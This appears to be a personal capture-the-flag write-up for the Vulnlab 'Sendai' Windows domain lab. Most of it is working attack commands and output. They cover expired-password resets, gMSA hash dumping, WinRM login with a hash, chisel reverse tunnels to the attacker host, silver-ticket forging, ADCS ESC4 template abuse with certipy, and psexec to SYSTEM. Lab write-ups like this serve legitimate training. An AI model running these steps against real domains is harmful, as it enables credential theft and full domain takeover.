Here is my notes on SENDAI box from Vulnlab which deployed to Hackthebox.
SENDAI: 10.10.67.214
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://sendai.vl/ -H "Host: FUZZ.sendai.vl"
-NO VHOSTS Unfortunately = NOPE !
-NO Intersting Directory Unfortunately = NOPE !
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-08 15:57:50Z)
GetNPUsers.py -dc-ip 10.10.67.214 sendai.vl/ -usersfile users.txt -format hashcat
-NO ASREPROASTING = NOPE !
GetUserSPNs.py -request -dc-ip 10.10.67.214 sendai.vl/Elliot.Yates:Password1
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQL/dc.sendai.vl sqlsvc 2023-07-11 05:51:18.413329 2024-11-08 10:52:11.223541
GetUserSPNs.py -request -dc-ip 10.10.67.214 sendai.vl/Elliot.Yates:Password1 -request -save -outputfile GetUserSPNS.out
Hash Uncrackable = NOPE
bloodhound-python -c All -u sqlsvc -p 'SurenessBlob85' -d sendai.vl --dns-tcp -ns 10.10.67.214
BloodHound Data:
Elliot.Yates -> Member Of -> SUPPORT@SENDAI.VL Group -> GenericAll -> ADMSVC@SENDAI.VL Group -> ReadGMSAPassword -> MGTSVC$@SENDAI.VL User -> CanPSRemote -> DC01.SENDAI.VL Machine.
Thomas.Powell -> Member Of -> SUPPORT@SENDAI.VL Group -> GenericAll -> ADMSVC@SENDAI.VL Group -> ReadGMSAPassword -> MGTSVC$@SENDAI.VL User -> CanPSRemote -> DC01.SENDAI.VL Machine.
Either of these two users will work so we are going to pick Thomas.Powell in this case.
net rpc group addmem "ADMSVC" "Thomas.Powell" -U "SENDAI.VL"/"Thomas.Powell"%"Password2" -S 10.10.67.214
net rpc group members "ADMSVC" -U "SENDAI.VL"/"Thomas.Powell"%"Password2" -S 10.10.67.214
Elliot.Yates Case:
net rpc group addmem "ADMSVC" "Elliot.Yates" -U "SENDAI.VL"/"Elliot.Yates"%"Password1" -S 10.10.67.214
net rpc group members "ADMSVC" -U "SENDAI.VL"/"Elliot.Yates"%"Password1" -S 10.10.67.214
gMSADumper.py -u 'Thomas.Powell' -p 'Password2' -d 'sendai.vl'
┌──(root㉿kali)-[/home/kali/Kali-Tools/gMSADumper]
└─# python3 gMSADumper.py -u 'Thomas.Powell' -p 'Password2' -d 'sendai.vl'
Users or groups who can read password for mgtsvc$:
> admsvc
mgtsvc$:::fe333e160e96ca73670f1c50c93ea2b1
mgtsvc$:aes256-cts-hmac-sha1-96:1733cabfeb1f836bd4b0eb8c04dc01c78d4dc1afbeb8a87282e235f97afc80b7
mgtsvc$:aes128-cts-hmac-sha1-96:26e861e9a44d8d63e60d9ceb440a12bf
┌──(root㉿kali)-[/home/kali/Kali-Tools/gMSADumper]
└─# crackmapexec winrm 10.10.67.214 -d sendai.vl -u mgtsvc$ -H fe333e160e96ca73670f1c50c93ea2b1
HTTP 10.10.67.214 5985 10.10.67.214 [*] http://10.10.67.214:5985/wsman
WINRM 10.10.67.214 5985 10.10.67.214 [+] sendai.vl\mgtsvc$:fe333e160e96ca73670f1c50c93ea2b1 (Pwn3d!)
-NICE !
135/tcp open msrpc Microsoft Windows RPC
rpcclient --user="" --command=enumdomusers -N 10.10.67.214
result was NT_STATUS_ACCESS_DENIED
Unless Account required, until then it's NOPE and don't bother !
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
LDAPv3.
Unless Account required, until then it's NOPE and don't bother !
443/tcp open ssl/http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbclient -N -L 10.10.67.214
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
config Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
sendai Disk company share
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.67.214 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# arsenal
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbmap -u "guest" -p "" -P 445 -H 10.10.67.214
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans - ShawnDEvans@gmail.com<mailto:ShawnDEvans@gmail.com>
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.67.214:445 Name: sendai.vl Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
config NO ACCESS
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
sendai READ ONLY company share #Interesting.
SYSVOL NO ACCESS Logon server share
Users READ ONLY #Nothing Interesting about this share. = OH WELL !
[*] Closed 1 connections
IPC$ AD Users enum as usual:
sudo lookupsid.py Guest@10.10.67.214 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
No creds spray with users.txt:users.txt = NOPE !
sendai share:
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# smbclient \\\\10.10.67.214\\"sendai" -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 18 13:31:04 2023
.. DHS 0 Wed Jul 19 10:11:25 2023
hr D 0 Tue Jul 11 08:58:19 2023
incident.txt A 1372 Tue Jul 18 13:34:15 2023
it D 0 Tue Jul 18 09:16:46 2023
legal D 0 Tue Jul 11 08:58:23 2023
security D 0 Tue Jul 18 09:17:35 2023
transfer D 0 Tue Jul 11 09:00:20 2023
7309822 blocks of size 4096. 799530 blocks available
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# ls
hr incident.txt it legal security transfer
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# tree -r .
.
├── transfer
│ ├── thomas.powell
│ ├── temp
│ ├── susan.harper
│ ├── lisa.williams
│ ├── elliot.yates
│ ├── clifford.davey
│ └── anthony.smith
├── security
│ └── guidelines.txt
├── legal
├── it
│ ├── PsExec64.exe
│ └── Bginfo64.exe
├── incident.txt
└── hr
13 directories, 4 files
┌──(root㉿kali)-[/home/…/VULNLAB/SENDAI/10.10.67.214/sendai]
└─# cat incident.txt
Dear valued employees,
We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.
To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.
We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.
If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.
Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.
guidlines.txt - just a security guidelines so nothing interesting about it.
[SNIP]
[SNIP]
crackmapexec smb 10.10.67.214 -u users.txt -p users.txt --continue-on-success
crackmapexec smb 10.10.67.214 -u users.txt -p '' --continue-on-success
[SNIP]
[-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
[-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
[SNIP]
smbpasswd.py Elliot.Yates:''@sendai.vl -newpass Password1
smbpasswd.py Thomas.Powell:''@sendai.vl -newpass Password2
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbpasswd.py Elliot.Yates:''@sendai.vl -newpass Password1
Impacket v0.11.0 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbpasswd.py Thomas.Powell:''@sendai.vl -newpass Password2
Impacket v0.11.0 - Copyright 2023 Fortra
===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================
Current SMB password:
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
crackmapexec smb 10.10.67.214 -u cracked-users.txt -p pass.txt --no-bruteforce --continue-on-success
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\Elliot.Yates:Password1
SMB 10.10.67.214 445 DC [+] sendai.vl\Thomas.Powell:Password2
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# crackmapexec smb 10.10.67.214 -u Elliot.Yates -p Password1 --no-bruteforce --shares
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\Elliot.Yates:Password1
SMB 10.10.67.214 445 DC [+] Enumerated shares
SMB 10.10.67.214 445 DC Share Permissions Remark
SMB 10.10.67.214 445 DC ----- ----------- ------
SMB 10.10.67.214 445 DC ADMIN$ Remote Admin
SMB 10.10.67.214 445 DC C$ Default share
SMB 10.10.67.214 445 DC config READ,WRITE
SMB 10.10.67.214 445 DC IPC$ READ Remote IPC
SMB 10.10.67.214 445 DC NETLOGON READ Logon server share
SMB 10.10.67.214 445 DC sendai READ,WRITE company share
SMB 10.10.67.214 445 DC SYSVOL READ Logon server share
SMB 10.10.67.214 445 DC Users READ
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# crackmapexec smb 10.10.67.214 -u Thomas.Powell -p Password2 --no-bruteforce --shares
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\Thomas.Powell:Password2
SMB 10.10.67.214 445 DC [+] Enumerated shares
SMB 10.10.67.214 445 DC Share Permissions Remark
SMB 10.10.67.214 445 DC ----- ----------- ------
SMB 10.10.67.214 445 DC ADMIN$ Remote Admin
SMB 10.10.67.214 445 DC C$ Default share
SMB 10.10.67.214 445 DC config READ,WRITE
SMB 10.10.67.214 445 DC IPC$ READ Remote IPC
SMB 10.10.67.214 445 DC NETLOGON READ Logon server share
SMB 10.10.67.214 445 DC sendai READ,WRITE company share
SMB 10.10.67.214 445 DC SYSVOL READ Logon server share
SMB 10.10.67.214 445 DC Users READ
Elliot.Yates and Thomas.Powell are same each other so we are going to pick Elliot.Yates in this case.
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# smbclient \\\\10.10.67.214\\"config" -U 'Thomas.Powell%Password2'
Try "help" to get a list of possible commands.
smb: \>
smb: \> dir
. D 0 Fri Nov 8 11:55:53 2024
.. DHS 0 Wed Jul 19 10:11:25 2023
.sqlconfig A 78 Tue Jul 11 08:57:11 2023
7309822 blocks of size 4096. 1807214 blocks available
smb: \> get .sqlconfig
getting file \.sqlconfig of size 78 as .sqlconfig (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=SurenessBlob85;
Found a credential for sqlsvc !
sqlsvc:SurenessBlob85
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sendai.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# evil-winrm -i 10.10.67.214 -u mgtsvc$ -H fe333e160e96ca73670f1c50c93ea2b1
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> whoami
sendai\mgtsvc$
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents>hostname
dc
USER-SHELL !
*Evil-WinRM* PS C:\> whoami
sendai\mgtsvc$
*Evil-WinRM* PS C:\> hostname
dc
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/8/2024 8:55 AM config
d----- 7/18/2023 10:27 AM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 7/19/2023 7:00 AM Program Files
d----- 7/18/2023 6:11 AM Program Files (x86)
d----- 11/8/2024 8:55 AM sendai
d----- 7/11/2023 2:35 AM SQL2019
d-r--- 11/8/2024 9:19 AM Users
d----- 7/19/2023 7:11 AM Windows
-a---- 7/18/2023 6:16 AM 36 user.txt
*Evil-WinRM* PS C:\> type user.txt
VL{REDIRECTED}
USER.TXT: VL{REDIRECTED}
PRIV ESC:
./chisel server -p 53 --reverse
./chisel.exe client 10.8.0.71:53 R:1433:0.0.0.0:1433
chisel server -p 2222 --reverse
chisel.exe client 10.8.0.71:2222 R:socks
chisel server -p 53 --reverse
chisel.exe client 10.8.0.71:53 R:socks
Silver-Ticket to MSSQL service since we have sqlsvc credential ?
sqlsvc:SurenessBlob85:58655C0B90B2492F84FB46FA78C2D96A
GetUserSPNs.py -request -dc-ip 10.10.67.214 sendai.vl/Elliot.Yates:Password1
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQL/dc.sendai.vl sqlsvc 2023-07-11 05:51:18.413329 2024-11-08 10:52:11.223541
lookupsid.py -hashes ':fe333e160e96ca73670f1c50c93ea2b1' 'sendai.vl/mgtsvc$@sendai.vl' 0
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# lookupsid.py -hashes ':fe333e160e96ca73670f1c50c93ea2b1' 'sendai.vl/mgtsvc$@sendai.vl' 0
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Brute forcing SIDs at sendai.vl
[*] StringBinding ncacn_np:sendai.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3085872742-570972823-736764132
impacket-ticketer -nthash 58655C0B90B2492F84FB46FA78C2D96A -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -user-id 500 Administrator
impacket-ticketer -nthash 58655C0B90B2492F84FB46FA78C2D96A -domain-sid S-1-5-21-3085872742-570972823-736764132 -spn MSSQL/dc.sendai.vl -dc-ip 10.10.67.214 -domain sendai.vl Administrator
ticketer.py -domain-sid S-1-5-21-3085872742-570972823-736764132 -domain sendai.vl -spn MSSQL/dc.sendai.vl -nthash 58655C0B90B2492F84FB46FA78C2D96A Administrator
export KRB5CCNAME=/home/kali/VULNLAB/SENDAI/10.10.67.214/Administrator.ccache
impacket-mssqlclient -k dc.sendai.vl
#Nope, Silver Ticket = Rabbit Hole. #Some said works but not for me so move on.
Windows:
Rubeus.exe silver /domain:sendai.vl /dc:dc.sendai.vl /sid:S-1-5-21-3085872742-570972823-736764132 /rc4:58655C0B90B2492F84FB46FA78C2D96A /user:administrator /service:MSSQL/dc.sendai.vl /ptt
sqlcmd -S dc.sendai.vl
PrivescCheck.ps1
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
https://github.com/itm4n/PrivescCheck
Running PrivescCheck.ps1:
[SNIP]
Name : Support
DisplayName :
ImagePath : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User : LocalSystem
StartMode : Automatic
[SNIP]
Found clifford.davy credential.
clifford.davey:RFmoB2WplgE_3p
clifford.davey is a member of ca-operators.
Certificate Authority:
ESC4:
certipy find -vulnerable -stdout -u Clifford.Davey@sendai.vl -p RFmoB2WplgE_3p -dc-ip 10.10.67.214
Template Name = SendaiComputer
Certificate Authorities = sendai-DC-CA
DNS Name : dc.sendai.vl
ESC4 vulnerability due to ca-operators group.
certipy template -dc-ip 10.10.67.214 -u Clifford.Davey -p 'RFmoB2WplgE_3p' -template SendaiComputer -target dc.sendai.vl -save-old
certipy req -ca sendai-DC-CA -dc-ip 10.10.67.214 -u Clifford.Davey -p 'RFmoB2WplgE_3p' -template SendaiComputer -target dc.sendai.vl -upn administrator@sendai.vl
certipy auth -pfx administrator.pfx
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# certipy auth -pfx administrator.pfx
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cfb106feec8b89a3d98e14dcbe8d087a
https://www.rbtsec.com/blog/active-directory-certificate-services-adcs-esc4/
https://dan-feliciano.com/2024/07/07/sendai/
https://scribe.bus-hit.me/@arz101/vulnlab-sendai-a7eb5cad15fd
┌──(root㉿kali)-[/home/kali/VULNLAB/SENDAI/10.10.67.214]
└─# crackmapexec smb 10.10.67.214 -u administrator -H cfb106feec8b89a3d98e14dcbe8d087a
SMB 10.10.67.214 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.67.214 445 DC [+] sendai.vl\administrator:cfb106feec8b89a3d98e14dcbe8d087a (Pwn3d!)
┌──(root㉿kali)-[/home/…/winPEASexe/binaries/x64/Release]
└─# psexec.py -hashes :cfb106feec8b89a3d98e14dcbe8d087a administrator@10.10.67.214
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.67.214.....
[*] Found writable share ADMIN$
[*] Uploading file ermqqYJm.exe
[*] Opening SVCManager on 10.10.67.214.....
[*] Creating service eVgG on 10.10.67.214.....
[*] Starting service eVgG.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.1850]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc
Administrator SHELL !
C:\Users\Administrator\Desktop> whoami
nt authority\system
C:\Users\Administrator\Desktop> hostname
dc
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is 6A7A-1702
Directory of C:\Users\Administrator\Desktop
07/18/2023 05:15 AM <DIR> .
07/18/2023 05:09 AM <DIR> ..
07/18/2023 05:15 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 7,331,069,952 bytes free
C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
ROOT.TXT: VL{REDIRECTED}
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
50995/tcp open msrpc Microsoft Windows RPC
51009/tcp open msrpc Microsoft Windows RPC
51016/tcp open msrpc Microsoft Windows RPC
51102/tcp open msrpc Microsoft Windows RPC
51117/tcp open msrpc Microsoft Windows RPC
56785/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows